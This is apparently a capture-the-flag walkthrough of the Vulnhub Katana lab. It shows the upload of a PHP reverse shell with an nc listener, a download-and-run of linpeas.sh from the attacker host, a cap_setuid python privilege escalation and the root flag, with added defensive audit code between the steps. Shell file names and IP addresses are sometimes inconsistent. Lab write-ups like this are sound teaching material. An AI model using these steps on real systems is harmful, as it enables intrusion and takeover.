[VLN] Katana

Today we are going to hack the Vulnhub machine called Katana. You can download it from the following link: https://www.vulnhub.com/entry/katana-1,482/
  • Video
  • Enumeration
  • We start with an nmap scan to see which ports are open.
    sml@m0nique:~$ nmap -A -p- 192.168.112.129
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-16 17:26 CEST
    Nmap scan report for katana.home (192.168.1.119)
    Host is up (0.0011s latency).
    Not shown: 65527 closed ports
    PORT     STATE SERVICE     VERSION
    21/tcp   open  ftp         vsftpd 3.0.3
    22/tcp   open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
    | ssh-hostkey:
    |   2048 89:4f:3a:54:01:f8:dc:b6:6e:e0:78:fc:60:a6:de:35 (RSA)
    |   256 dd:ac:cc:4e:43:81:6b:e3:2d:f3:12:a1:3e:4b:a3:22 (ECDSA)
    |_  256 cc:e6:25:c0:c6:11:9f:88:f6:c4:26:1e:de:fa:e9:8b (ED25519)
    80/tcp   open  http        Apache httpd 2.4.38 ((Debian))
    |_http-server-header: Apache/2.4.38 (Debian)
    |_http-title: Katana X
    139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp  open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
    7080/tcp open  ssl/http    LiteSpeed httpd
    |_http-server-header: LiteSpeed
    |_http-title: Katana X
    | ssl-cert: Subject: commonName=katana/organizationName=webadmin/countryName=US
    | Not valid before: 2020-05-11T13:57:36
    |_Not valid after:  2022-05-11T13:57:36
    |_ssl-date: 2020-05-16T15:26:44+00:00; 0s from scanner time.
    | tls-alpn:
    |   h2
    |   spdy/3
    |   spdy/2
    |_  http/1.1
    8088/tcp open  http        LiteSpeed httpd
    |_http-server-header: LiteSpeed
    |_http-title: Katana X
    8715/tcp open  http        nginx 1.14.2
    | http-auth:
    | HTTP/1.1 401 Unauthorized\x0D
    |_  Basic realm=Restricted Content
    |_http-server-header: nginx/1.14.2
    |_http-title: 401 Authorization Required
    Service Info: Host: KATANA; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

    Host script results:
    |_clock-skew: mean: 1h00m00s, deviation: 2h00m00s, median: 0s
    |_nbstat: NetBIOS name: KATANA, NetBIOS user: , NetBIOS MAC: (unknown)
    | smb-os-discovery:
    |   OS: Windows 6.1 (Samba 4.9.5-Debian)
    |   Computer name: katana
    |   NetBIOS computer name: KATANA\x00
    |   Domain name: \x00
    |   FQDN: katana
    |_  System time: 2020-05-16T11:26:41-04:00
    | smb-security-mode:
    |   account_used: guest
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: disabled (dangerous, but default)
    | smb2-security-mode:
    |   2.02:
    |_    Message signing enabled but not required
    | smb2-time:
    |   date: 2020-05-16T15:26:40
    |_  start_date: N/A

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 29.89 seconds
    We see that it has several open ports; after some investigation, we dig into port 8088 to see whether we can find anything interesting.
    sml@m0nique:~$ gobuster dir -u http://192.168.112.129:8088 -w /usr/share/wordlists/dirb/big.txt -x txt,php,html
    ===============================================================
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    ===============================================================
    [+] Url:            http://192.168.112.129:8088
    [+] Threads:        10
    [+] Wordlist:       /usr/share/wordlists/dirb/big.txt
    [+] Status codes:   200,204,301,302,307,401,403
    [+] User Agent:     gobuster/3.0.1
    [+] Extensions:     txt,php,html
    [+] Timeout:        10s
    ===============================================================
    2020/05/22 23:03:06 Starting gobuster
    ===============================================================
    /.htaccess (Status: 403)
    /blocked (Status: 301)
    /cgi-bin (Status: 301)
    /css (Status: 301)
    /docs (Status: 301)
    /error404.html (Status: 200)
    /img (Status: 301)
    /index.html (Status: 200)
    /phpinfo.php (Status: 200)
    /protected (Status: 301)
    /upload.php (Status: 200)
    /upload.html (Status: 200)
    ===============================================================
    2020/05/22 23:03:12 Finished
    ===============================================================
    We see a page called upload.html, which looks interesting. On inspection, it lets us upload files, and it renames each file it receives. If we then run gobuster to look for the new file name, we find it served at http://192.168.112.129:8715/.
  • Exploitation
  • At http://192.168.112.129:8715/ we first have to log in using admin/admin :) So, knowing this, we prepare our reverse shell and edit it so that it points back to our machine.
    sml@m0nique:~$ cp /usr/share/webshells/php/php-reverse-shell.php .
    sml@m0nique:~$ mv php-reverse-shell.php shelli.php
    sml@m0nique:~$ nano shelli.php
    We upload it at http://192.168.112.129:8088/upload.html. The result it gives us is:
    File : file1
    Name : reshell.php
    Type : application/x-php
    Path : /tmp/phpJMsNlv
    Size : 5494
    Please wait for 1 minute!. Please relax!.
    Moved: /tmp/phpJMsNlv ====> /opt/manager/html/katana_shelli.php
    MD5 : ad5545baba3150a5e5339ab720777fd4
    Size : 5494 bytes
    We see that it has renamed our reverse shell to katana_shelli.php. We start nc listening on our machine.
    sml@m0nique:~$ nc -nlvp 4444
    And finally we visit http://192.168.112.129:8715/katana_reshell.php (remember that before "visiting" your shell you have to go to http://192.168.112.129:8715 and log in with admin/admin).
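    The chain above works because upload.php accepts a .php file, stores it under a predictable name (katana_ plus the original name) in a directory that the nginx vhost on port 8715 serves and executes. The following is an added example, not code from the machine or from this write-up, showing the three checks a hardened upload handler applies: an extension allowlist that also rejects embedded executable extensions, stripping of any path components, and a server-generated random name stored outside the web root. ALLOWED_EXTENSIONS, EXECUTABLE_HINTS and UPLOAD_DIR are assumptions for a hypothetical image/PDF upload feature.

```python
import os
import secrets
from pathlib import PurePosixPath

# Extensions this hypothetical upload feature needs (assumption: it receives images/PDFs).
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf"}
# Extensions a web server might hand to an interpreter; none may appear anywhere in the name.
EXECUTABLE_HINTS = {"php", "php3", "php5", "phtml", "phar", "html", "htm", "cgi", "pl", "py", "sh"}
# Storage directory outside every web root (assumption). Katana's handler wrote into
# /opt/manager/html, which the nginx vhost on :8715 served and executed as PHP.
UPLOAD_DIR = "/var/app/uploads"


class UploadRejected(ValueError):
    """Raised when a client-supplied filename fails validation."""


def safe_storage_name(client_filename: str) -> str:
    """Validate the client's filename and return a server-chosen one.

    Properties Katana's upload.php lacked:
    - only allow-listed extensions are accepted, and no executable extension may be
      embedded anywhere in the name (shell.php.jpg, shell.php\\x00.jpg);
    - directory components are dropped, so "../" cannot steer the file elsewhere;
    - the client's base name is discarded, so the stored name is not guessable
      (Katana used "katana_" + original name, found with one gobuster run).
    """
    name = PurePosixPath(client_filename.replace("\\", "/")).name
    if not name or name.startswith("."):
        raise UploadRejected("empty or hidden filename")
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in name):
        raise UploadRejected("control character in filename")
    parts = name.lower().split(".")
    if len(parts) < 2 or not all(parts):
        raise UploadRejected("missing or empty extension")
    ext = parts[-1]
    if ext not in ALLOWED_EXTENSIONS:
        raise UploadRejected(f"extension .{ext} not allowed")
    if any(p in EXECUTABLE_HINTS for p in parts[1:-1]):
        raise UploadRejected("executable extension embedded in filename")
    return f"{secrets.token_hex(16)}.{ext}"


def storage_path(client_filename: str) -> str:
    """Absolute path under UPLOAD_DIR where the upload should be written."""
    return os.path.join(UPLOAD_DIR, safe_storage_name(client_filename))


def is_accepted(client_filename: str) -> bool:
    """Convenience wrapper: True if the name passes validation."""
    try:
        safe_storage_name(client_filename)
        return True
    except UploadRejected:
        return False


if __name__ == "__main__":
    for candidate in ("photo.jpg", "shelli.php", "shell.php.jpg", "../../opt/manager/html/x.png"):
        print(f"{candidate!r:40} -> {'accepted' if is_accepted(candidate) else 'rejected'}")
```

    Even with these checks, the storage directory should be served (if at all) with script execution disabled and the files returned with a fixed Content-Type, so that a misclassified file is never interpreted by the server.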
  • Low Shell
    sml@m0nique:~$ nc -nlvp 4444
    listening on [any] 4444 ...
    connect to [192.168.112.128] from (UNKNOWN) [192.168.112.129] 36014
    Linux katana 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64 GNU/Linux
     05:04:56 up 14 min,  0 users,  load average: 0.05, 0.08, 0.05
    USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    /bin/sh: 0: can't access tty; job control turned off
    $
    We're in; now let's explore the system :)
    $ python -c 'import pty; pty.spawn("/bin/sh")'
    $ cd /home
    $ ls
    katana
    $ cd katana
    $ ls -la
    total 32
    drwxr-xr-x 4 katana katana 4096 May 21 05:04 .
    drwxr-xr-x 3 root   root   4096 May 11 09:33 ..
    -rw-r--r-- 1 katana katana  220 May 11 09:33 .bash_logout
    -rw-r--r-- 1 katana katana 3526 May 11 09:33 .bashrc
    drwx------ 3 katana katana 4096 May 11 11:57 .gnupg
    -rw-r--r-- 1 katana katana  807 May 11 09:33 .profile
    drwxrwxrwx 2 katana katana 4096 May 16 15:28 .ssh
    -rw-r--r-- 1 root   root     19 May 11 11:52 .ssh_passwd
    $ cat .ssh_passwd
    katana@katana12345
    This looks like the password for the katana user, so let's try it...
    $ su katana
    Password: katana12345
    python -c 'import pty; pty.spawn("/bin/sh")'
    $
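    Two things in that directory listing handed the low-privileged www-data shell the next account: a world-readable file holding a password (.ssh_passwd, mode 644) and a world-writable ~/.ssh (drwxrwxrwx), which would let any local user drop an authorized_keys file for katana. The following is an added example, not part of the original write-up, of a small audit that walks a home directory and reports both conditions; build_demo_home() constructs a throw-away copy of the katana home layout so the check can be run offline, and SECRET_NAME_HINTS is this example's own list of name fragments.

```python
import os
import stat
import tempfile

# Name fragments that usually indicate stored secrets (this example's own list).
SECRET_NAME_HINTS = ("passwd", "password", "secret", "credential", "token",
                     "id_rsa", "id_ed25519", "id_ecdsa", ".netrc")


def audit_home(home: str) -> list:
    """Audit one home directory; returns sorted (severity, path, reason) tuples.

    Two conditions from the Katana listing are checked:
    - a group- or world-writable ~/.ssh (Katana: drwxrwxrwx), which lets any local
      user plant an authorized_keys file and log in as the owner;
    - a credential-looking file readable by everyone (Katana: -rw-r--r-- .ssh_passwd),
      which is how the www-data shell read the katana password.
    """
    findings = []
    ssh_dir = os.path.join(home, ".ssh")
    if os.path.isdir(ssh_dir) and not os.path.islink(ssh_dir):
        mode = stat.S_IMODE(os.lstat(ssh_dir).st_mode)
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append(("HIGH", ssh_dir,
                             f"~/.ssh is group/world-writable (mode {mode:04o})"))
    for root, _dirs, files in os.walk(home):
        for fname in files:
            path = os.path.join(root, fname)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue
            mode = stat.S_IMODE(st.st_mode)
            if (mode & stat.S_IROTH) and any(h in fname.lower() for h in SECRET_NAME_HINTS):
                findings.append(("HIGH", path,
                                 f"credential-like file is world-readable (mode {mode:04o})"))
    return sorted(findings)


def build_demo_home() -> str:
    """Create a throw-away directory mirroring the katana user's home (constructed)."""
    home = tempfile.mkdtemp(prefix="katana_home_")
    for name, mode in ((".bashrc", 0o644), (".profile", 0o644), (".ssh_passwd", 0o644)):
        path = os.path.join(home, name)
        with open(path, "w") as fh:
            fh.write("demo\n")          # placeholder content, not the real password
        os.chmod(path, mode)
    ssh_dir = os.path.join(home, ".ssh")
    os.mkdir(ssh_dir)
    os.chmod(ssh_dir, 0o777)             # the drwxrwxrwx from the listing
    gnupg = os.path.join(home, ".gnupg")
    os.mkdir(gnupg)
    os.chmod(gnupg, 0o700)               # correctly locked down, must not be reported
    return home


def audit_all_homes(base: str = "/home") -> list:
    """Run audit_home over every directory under base (for use on a real host)."""
    results = []
    for entry in sorted(os.listdir(base)):
        home = os.path.join(base, entry)
        if os.path.isdir(home):
            results.extend(audit_home(home))
    return results


if __name__ == "__main__":
    for sev, path, reason in audit_home(build_demo_home()):
        print(f"[{sev}] {path}: {reason}")
```

    On the real machine the fix is `chmod 700 ~/.ssh` and removing the password file altogether (or at minimum `chmod 600` and keeping it out of a home directory that a web-server account can traverse).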
    Now that we are the "katana" user, we download linpeas.sh from our machine to explore the system in more detail and see how we can escalate privileges.
    $ cd /tmp
    $ wget http://192.168.112.128/linpeas.sh
    $ sh linpeas.sh
    From the linpeas output, the part we are interested in is:
    [+] Capabilities
    [i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities
    /usr/bin/ping = cap_net_raw+ep
    /usr/bin/python2.7 = cap_setuid+ep
    We see that python2.7 has cap_setuid, which will let us escalate privileges...
  • Privilege Escalation
    $ python2.7 -c 'import os; os.setuid(0); os.system("/bin/sh")'
    # id
    id
    uid=0(root) gid=1000(katana) groups=1000(katana),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
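    The escalation needed no exploit at all: cap_setuid on an interpreter means anyone who can run python2.7 can call setuid(0). cap_net_raw on ping, by contrast, is the normal Debian default and is not a finding. The following is an added example, not code from linpeas or from this write-up, of a check that parses `getcap -r /` output (both the older "path = caps+ep" and the newer "path caps=ep" formats) and grades each entry: a capability from DANGEROUS_CAPS on an interpreter is critical, the same capability on any other binary is high, and any capability on an interpreter is at least worth a look. DANGEROUS_CAPS and INTERPRETER_PREFIXES are this example's own grouping, and SAMPLE_GETCAP is a constructed sample built from the two lines linpeas reported plus one extra line in the newer format.

```python
import os
import re
import shutil
import subprocess

# File capabilities that let an unprivileged caller reach root, or read/write any file,
# without an exploit. The grouping is this example's own, not linpeas's.
DANGEROUS_CAPS = {
    "cap_setuid": "can switch to uid 0 (the Katana path)",
    "cap_setgid": "can switch to any gid",
    "cap_dac_override": "bypasses file permission checks",
    "cap_dac_read_search": "can read every file (e.g. /etc/shadow)",
    "cap_chown": "can change file ownership",
    "cap_fowner": "can change permissions of any file",
    "cap_setfcap": "can grant capabilities to other files",
    "cap_sys_admin": "broad admin powers (mounts, namespaces)",
    "cap_sys_ptrace": "can attach to other users' processes",
    "cap_sys_module": "can load kernel modules",
}
# Programs that run caller-supplied code; any capability on them is effectively
# handed to whoever can execute them.
INTERPRETER_PREFIXES = ("python", "perl", "ruby", "php", "node", "lua")


def parse_getcap_line(line: str):
    """Return (path, [cap names]) for one getcap line, or None if it carries none.

    Handles both output formats: libcap < 2.41 prints "/path = cap_x+ep",
    libcap >= 2.41 prints "/path cap_x=ep".
    """
    line = line.strip()
    if not line:
        return None
    if " = " in line:
        path, caps = line.split(" = ", 1)
    else:
        parts = line.split(None, 1)
        if len(parts) != 2:
            return None
        path, caps = parts
    return path, re.findall(r"cap_[a-z_]+", caps)


def assess(getcap_lines) -> list:
    """Classify getcap output; returns (severity, path, [caps]) sorted by path."""
    findings = []
    for line in getcap_lines:
        parsed = parse_getcap_line(line)
        if parsed is None:
            continue
        path, caps = parsed
        base = os.path.basename(path)
        interpreter = any(base.startswith(p) for p in INTERPRETER_PREFIXES)
        bad = [c for c in caps if c in DANGEROUS_CAPS]
        if bad:
            findings.append(("CRITICAL" if interpreter else "HIGH", path, bad))
        elif interpreter:
            # Even a "harmless" capability on an interpreter deserves a look.
            findings.append(("MEDIUM", path, caps))
    return sorted(findings, key=lambda f: f[1])


def scan_host() -> list:
    """Run getcap -r / on the local machine (Linux with the libcap tools installed)."""
    if shutil.which("getcap") is None:
        raise RuntimeError("getcap not installed")
    proc = subprocess.run(["getcap", "-r", "/"], capture_output=True, text=True)
    return assess(proc.stdout.splitlines())


# Constructed sample: the two lines linpeas reported on Katana plus one line in the
# newer getcap format, to exercise the parser.
SAMPLE_GETCAP = [
    "/usr/bin/ping = cap_net_raw+ep",
    "/usr/bin/python2.7 = cap_setuid+ep",
    "/usr/bin/perl cap_net_bind_service=ep",
]

if __name__ == "__main__":
    for sev, path, caps in assess(SAMPLE_GETCAP):
        print(f"[{sev}] {path}: {','.join(caps)}")
```

    Remediation on the machine is simply `setcap -r /usr/bin/python2.7`; a periodic `getcap -r /` compared against a known-good baseline catches this class of misconfiguration before an attacker's linpeas run does.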
  • root.txt
    # cd /root
    cd /root
    # ls
    ls
    root.txt
    # cat root.txt
    cat root.txt
    {R00t_key_Katana_91!}
  • End
  • And with that, we are root on the machine :)